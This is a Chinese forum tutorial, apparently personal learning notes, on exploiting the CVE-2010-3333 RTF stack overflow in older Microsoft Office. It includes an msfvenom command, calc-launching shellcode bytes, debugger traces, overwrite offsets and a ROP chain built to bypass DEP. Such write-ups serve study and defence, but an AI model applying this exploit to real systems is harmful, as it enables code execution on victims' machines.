来源:http://bbs.ichunqiu.com/thread-9636-1-1.html?from=ch
cve 2010-3333漏洞是一个栈溢出漏洞,该漏洞是由于Microsoft 文档在处理RTF 数据的对数据解析处理错误,可被利用破坏内存,导致任意代码执行。影响的offices的版本系列有:Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008等。
我们的目标就是要利用metasploit生成一个会使office崩溃的样本,然后通过手工修改样本,使样本能够执行计算器程序
生成shellcode
shellcode的主要功能是调用计算器
生成命令
[C]纯文本查看复制代码
?
1
msfvenom -p windows/exec cmd=calc.exe -a x86 --platform win -b \x00 -f c -o /root/temp/calc11.bin
smfvenom常用的几个参数:
-f exe:指定生成文件的格式,可以为C,python等格式,这里指定生成exe格式的文件
-i 5:shellcode解码的次数
-b \x00:指定坏字符,这里将00做为坏字符,这样生成的shellcode中就不会有\00字符
生成的shellcode为
[C]纯文本查看复制代码
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16unsignedcharbuf[] =
"\xbb\xae\x1d\x04\x2e\xda\xc4\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x31\x31\x5a\x13\x83\xc2\x04\x03\x5a\xa1\xff\xf1\xd2\x55\x7d"
"\xf9\x2a\xa5\xe2\x73\xcf\x94\x22\xe7\x9b\x86\x92\x63\xc9\x2a"
"\x58\x21\xfa\xb9\x2c\xee\x0d\x0a\x9a\xc8\x20\x8b\xb7\x29\x22"
"\x0f\xca\x7d\x84\x2e\x05\x70\xc5\x77\x78\x79\x97\x20\xf6\x2c"
"\x08\x45\x42\xed\xa3\x15\x42\x75\x57\xed\x65\x54\xc6\x66\x3c"
"\x76\xe8\xab\x34\x3f\xf2\xa8\x71\x89\x89\x1a\x0d\x08\x58\x53"
"\xee\xa7\xa5\x5c\x1d\xb9\xe2\x5a\xfe\xcc\x1a\x99\x83\xd6\xd8"
"\xe0\x5f\x52\xfb\x42\x2b\xc4\x27\x73\xf8\x93\xac\x7f\xb5\xd0"
"\xeb\x63\x48\x34\x80\x9f\xc1\xbb\x47\x16\x91\x9f\x43\x73\x41"
"\x81\xd2\xd9\x24\xbe\x05\x82\x99\x1a\x4d\x2e\xcd\x16\x0c\x24"
"\x10\xa4\x2a\x0a\x12\xb6\x34\x3a\x7b\x87\xbf\xd5\xfc\x18\x6a"
"\x92\xf3\x52\x37\xb2\x9b\x3a\xad\x87\xc1\xbc\x1b\xcb\xff\x3e"
"\xae\xb3\xfb\x5f\xdb\xb6\x40\xd8\x37\xca\xd9\x8d\x37\x79\xd9"
"\x87\x5b\x1c\x49\x4b\xb2\xbb\xe9\xee\xca";
生成漏洞文件
使用metasploit生成会崩溃的样本,我们的目的就是自己修改文档,使文档可以弹出计算机利用。
生成的是会触发的样本,只会触发漏洞,会产生崩溃
分析漏洞
因为我们生成的是一个崩溃的样本,点击运行后,果然会使word崩溃。
运行windbg,加载winword,打开生成的漏洞文件。程序崩溃,如下图
1.png
此时,我们通过下面命令看下栈空间的函数调用关系
0:000> kb L3
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
003d99d8 6b0399a5 003d99ec a4bbddda 05000000 mso!Ordinal7356+0x131e
003d99f4 6b039b17 a4bbddda 052d48b0 003d9a24 mso!Ordinal2605+0x327e
003d9a2c 5e03145e 052d48b0 f6ce0e50 13466fa0 mso!Ordinal2605+0x33f0
到崩溃的函数看看
0:000> u 6b0399a5
mso!Ordinal2605+0x327e
我下断点一般常用的是bu命令,这里看下这个地址对应的符号地址,以方便bu断点使用
bu mso!Ordinal2605+0x3279
断下来
2.png
进入call 后
[C]纯文本查看复制代码
?
1
2
3
4
56aecf5d8 55 push ebp
6aecf5d9 8bec mov ebp,esp
6aecf5db 8b450c mov eax,dword ptr [ebp+0Ch] ss:002b:003d99e4=a4bbddda
6aecf5de 8d04c5f0f5ec6a lea eax,mso!Ordinal7356+0x1329 (6aecf5f0)[eax*8]
6aecf5e5 8b4804 mov ecx,dword ptr [eax+4] 在这行出错
可以看到eax 来自于[ebp+0ch],在这一步后,eax = a4bbddda,这个a4bbddda就是来自于断点中的函数调用时的第二个参数,这说明在上面函数传递参数时就传递了一个错误的参数,所以出错的地方还在上层函数。
so, 我们根据栈空间中的函数调用关系继续找上一层函数,上一层函数调用地址为:
mso!Ordinal2605+0x33eb
在调用这个函数时,可以看到,传递的第三个参数就是出错时的a4bbddda,所以还要通过栈空间中函数调用关系向上层函数找
3.png
而就在我们要向上一层回溯时,发现这时kb L3显示的栈已经无法回溯了,这说明此时栈已经被破坏了。破坏的图如下:
4.png
至此,既然在windbg中已经无法得知上层函数的调用来源,我们只有请出IDA来分析,
在IDA来到图中6b039b12的位置,在IDA中向上回溯,可以看到距离我们发现栈被破坏后最近的函数调用是6B039AF9,我们有理由怀疑是这个6B039AF9发生了栈溢出,破坏了栈。
通过分析后知道,确实是在这个函数中发生了溢出。(如果分析到这个函数,发现并不是这个函数发生的栈溢出,我们只能接着向上再回溯函数)
5.png
恢复虚拟机,重新来过,在mso!Ordinal2605+0x33d2处(也就是6B039AF9处)下断点
6.png
断下后,注意看传递来的两个参数,参数二为栈空间中的地址,如图:
7.png
用IDA到6A99B0DB处看看,函数中的6A99B0FB处的memcpy就毫不留情的将漏洞点暴露了出来:
8.png
在windbg中跟到6A99B0FB处后,看函数的参数,参数一是一个栈地址,参数二指向了” daddbba4aad8…”,参数三等于c8ac:
9.png
而这三个参数都是来自于文件中:
10.png
漏洞利用:
我们是利用覆盖返回地址的方法来控制EIP:
通过kb L3命令看到返回地址为6b039c4c,(6b039afc为这层函数的返回地址,这层覆盖不到这个地址),memcpy的参数为003d9a1c,距离6b039c4c较近
11.png
003d9a30 - 003d9a1c = 14 所以在文件中的第18H处的内容就会覆盖掉返回地址,
从栈中(memcpy函数运行前后比较:
12.png
在上图中,我们将003d9a30处的返回地址覆盖成了5e03145e,此时运行时,会发现,函数还没有运行到返回时,就会崩溃,这时的崩溃跟我们前面分析过的原因是一样的。
都是在
[C]纯文本查看复制代码
?
1
6aecf5e5 8b4804 mov ecx,dword ptr [eax+4] 在这行出错
向上回溯函数时
[C]纯文本查看复制代码
?
1
mso!Ordinal2605+0x33eb:
在调用这个函数时,可以看到,传递的第三个参数是造成出错的原因
函数在处理时,对第四个参数的值进行判断,如果为0就直接返回,否则就会取第三个参数的值,进行一定的运算取地址,因为我们构造的文档的数据是随机的,导致第三个参数的值不确定,第四个参数的值不为0,而对第三个参数进行运算取地址时取到了不可访问的地址,从而造成的崩溃。
13.png
所以在利用漏洞时,必须确保在溢出后调用6B039973函数时不能取到非法地址,所以我们在调用这个函数时,通过构造文档,使调用这个函数的第四个参数为0,从而使这个函数正常返回,而调用这个函数的第四个参数可以被我们覆盖掉,
14.png
第四个参数对应的栈地址为:003d9a44,而我们开始覆盖的位置为003d9a1c
003d9a44 - 003d9a1c = 28H
所以,我们在文档中从开始拷贝处偏移28H处的内容必须为0.对应文件中,下面的红框位置必须为0
15.png
上图可见,我们的覆盖函数返回地址的数据为2e588c78,
16.png
这里只所以选择ret 0c这条指令,是为了跳过红框中的0数据,这样在ret 0c时就会来到
78880039(也就是红框后面的内容)
17.png
在后面,就是我们构造的ROP链,之所以使用rop链是因为我们的代码拷贝到栈中,而DEP保护会无法执行栈中的指令,使用rop定位到VirtualProtect给栈空间加上执行权限:
18.png
我们的rop链是使用mona生成的。Mona生成的传递给VirtualProtect的size参数为0x201,我改成了0x401。
19.png
Rop 链后面的数据,是我们的shellcode
20.png
最终:我们文件的布局为:
21.png
通过上面的布局,我们就可以弹出计算器了。
在这个过程中,最为复杂的要算是rop的生成,手工打造rop非常非常繁琐,但好在已经有无数的大牛为我们提供了好用的工具,mona这款工具在生成rop方面有着很多优秀的功能,具体使用说明请参阅官方文档。
总结
文章只是自己的学习笔记,错误在所难免,请多多指教。文章只供学习交流,欢迎转载。如需其他版本,请联系作者。
[1]分析样本下载地址:链接:http://pan.baidu.com/s/1kVCprOb密码:ss8c